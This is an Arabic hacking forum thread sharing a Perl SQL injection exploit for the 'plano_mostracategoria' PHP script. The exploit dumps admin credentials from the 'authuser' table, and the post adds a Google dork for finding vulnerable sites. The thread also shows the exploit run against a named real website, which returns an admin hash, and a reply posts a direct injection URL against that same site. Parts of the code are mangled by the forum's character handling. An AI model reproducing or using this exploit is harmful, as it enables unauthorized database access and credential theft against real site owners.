ثغره بسيطه بسكربت استضافه plano mostracategoria (id) Remote SQL Injection Vulnerabil




#!/usr/bin/perl -w
# plano mostracategoria (id) Remote SQL Injection Vulnerability
# Author    : kalashnikov
# Site      : http://kalashnikov-team.com + http://vbspiders.com
# Group     : KaLa$nikoV t34m
# Date      : {13-9-2010}
# Software  : plano_mostracategoria
# Greetz    : Madjix,ViRuS_HaCkErS,his0k4,el$b7 elmr7,sec4ever,red virus,hassan81,claw,RiSkY,data$hack,Cr3W-Dz,Antivirus7,El3ctr0-dz
# team      : VoLc4n0 --=-- stone love --=-- fla$h
print "|----------------------------------------------------|
";
print "|  plano mostracategoria Remote SQL Injector'        |
";
print "| Coded by : kalashnikov                             |
";
print "| Dork     : inurl:plano_mostracategoria             |
";
print "|                                                    |
";
print "| admin cp : /login.php or /vadmin                   |
";
print "|                  kalashnikov team                  |
";
print "|----------------------------------------------------|
";
use LWP::UserAgent;
print "
Masukin Target:***91;http://wwww.target.com/path/***93;: ";
chomp(my $target=<STDIN>);
#Nama Column
$concatenation="concat(uname,char(58),passwd)volc4n0";
#Nama Table
$table="authuser";
$injection="-7+union+select+";
$b = LWP::UserAgent->new() or die "Could not initialize browser
";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "plano_index.php?paginas=plano_mostracategoria&cat_id=".$injection."+".$concatenation.",1,2,3,4,5,6,7+from/**/".$table."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/(***91;0-9a-fA-F***93;{32})/){
print "
***91;+***93; Admin Hash : $1
";
print "***91;+***93; Success !! Check target for details...
";
print "
";
print "Attention:
";
print "VoLc4n0 palestine hacker
";
print " !!
";
print "
";
}
else{print "
***91;-***93; wah gagal bro (Belom Cebok tangan lo)...
";
print "
";
print "
";
print "localhost/plano_index.php?paginas=plano_mostracategoria&cat_id=-7+union+select+@@version,2,3,4,5,6,7,8--
";
}



لسا الليله بنزل الثغره بمواقع السكيورتي
يالله توصلكم قبل الكل :smiley:

وهي تطبيق ع احد المواقع



root@bt:~# perl sql.pl
Possible unintended interpolation of @version in string at sql.pl line 42.
Name "main::version" used only once: possible typo at sql.pl line 42.
|----------------------------------------------------|
|  plano mostracategoria Remote SQL Injector'        |
| Coded by : kalashnikov                             |
| Dork     : inurl:plano_mostracategoria             |
|                                                    |
| admin cp : /login.php or /vadmin                   |
|                  kalashnikov team                  |
|----------------------------------------------------|

Masukin Target:[http://wwww.target.com/path/]: http://www.dkweb.com.br/

[+] Admin Hash : d9e64fe43692c1449a70e4b57770cc4d
[+] Success !! Check target for details...

Attention:
VoLc4n0 palestine hacker
 !!

root@bt:~#




موفقين

جميل جدا …

مبروك الاكتشاف … تقبل مروري

مشاء الله مدهر فريقكم بصراحه #

واحلى حاجه نزلتها هنا قبل السكيورتي

بطبقها وارد لك

Unknown verb pattern ‘91;0-9a-fA-F*93;{32}’ in regex; marked by <– HERE in m/(91;0-9a-fA-F93;{32}) <– HERE / at top.pl line 32.

اخوي يظهر خطاء … يمكن ماحطيت الكود كامل او وش المشكله

جميلة اخي

لإستغلال هيك

plano_index.php?paginas=plano_mostracategoria&cat_id=-7+union+select++concat(uname,char(58),passwd)volc4n0,1,2,3,4,5,6,7+from/**/authuser+--+

الديمو
http://www.dkweb.com.br/plano_index.php?paginas=plano_mostracategoria&cat_id=-7+union+select++concat%28uname,char%2858%29,passwd%29volc4n0,1,2,3,4,5,6,7+from/**/authuser±-+

مبرووووووووووك الاكشتاف

مبروك الاكتشاف …

بس الثغره بسبب حماية المنتدى فيها

اكواد مشفره

مشكورين ع مروركم الطيب

بالنسبه للي ما عملت معاه الثغره بكون السبب زي ما قال اورناج مان حمايت المنتدى مسحت جزء من الاكواد

يالله بتشوفوها بمواقع الثغرات بس تنزل

بارك الله فيك مبروك الاكتشاف

تفضلو رابط الثغره يا شباب

http://inj3ct0r.com/exploits/14078

يعطيك العافيه اخي ومبروووك الاكشتااااف